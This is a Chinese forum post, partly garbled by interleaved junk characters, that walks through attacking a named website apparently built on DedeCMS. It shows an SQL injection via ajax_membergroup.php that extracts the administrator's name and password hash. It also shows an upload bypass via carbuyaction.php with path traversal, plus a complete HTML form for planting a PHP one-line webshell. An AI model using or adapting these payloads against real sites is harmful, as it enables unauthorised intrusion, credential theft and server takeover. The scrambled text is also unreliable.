①注入漏洞。
9 W" A( y4 {' U* n. f这站 http://www.political-security.com/
0 z% Q, y/ s( i) M首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
2 r) P0 Q, U# j2 X) A. Twww.political-security.com/data/mysql_error_trace.inc 爆后台, s( l$ V; u& h, a
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。% k M) \& {( P. `; y6 {$ m. C% d
然后写上语句
9 \: a( F3 E: y" T查看管理员帐号+ T }. ?6 w; M& K
http://www.political-security.co ... &membergroup=@`
- e1 P0 |- V/ k) G
. ~% g5 G8 y e1 T0 ?admin
3 I; o/ z; e5 ]6 k* e" P) k: W4 Z' b# G/ f
查看管理员密码2 _' d, {1 M( r, \
http://www.political-security.co ... &membergroup=@`8 V1 J) s5 Y: @* V
) y! P7 q$ c3 \5 _
8d29b1ef9f8c5a5af4296 y$ D6 |9 ]3 d" j" E/ e6 ^
+ H/ X, z; A/ ^, l3 B6 c1 P. _+ ~
查看管理员密码
; `) l; K0 p( B; n" _6 _$ E) \
3 N* s0 x& p; _得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5# h) t9 i; A1 F
+ J: ]; g5 X# J4 j4 g
8d2
; n0 d7 {) q" z$ e* [( Q- T9b1ef9f8c5a5af42
% _ v8 |/ e/ P( H& Y96 `* i1 V% Y- n* x# h
9 r( c% B/ \# j/ Hcmd5没解出来 只好测试第二个方法
: B1 N2 P$ _ V ? @2 z- a5 O/ h3 ~2 U5 Z, O4 X
. ^2 P; E5 I( p( b
②上传漏洞:2 F E( |# F# U
8 @+ R- W" H7 X1 E" A1 o
只要登陆会员中心,然后访问页面链接
4 P, b0 a. h1 h, M“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
( I8 [: @( r# u( \' y
# u" w" }; C$ g* i如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
! b" `7 }; H/ W4 p1 m9 }& L3 E; `7 V& t& V4 ^0 C0 r3 h
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm( u$ X3 G$ A* m L
m% t4 G; v3 X' v2 c! _! Z
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
6 W0 ]5 w# W2 @& T" f/ _6 @- Y或者
4 o7 a3 i8 y) p即可上传成功 |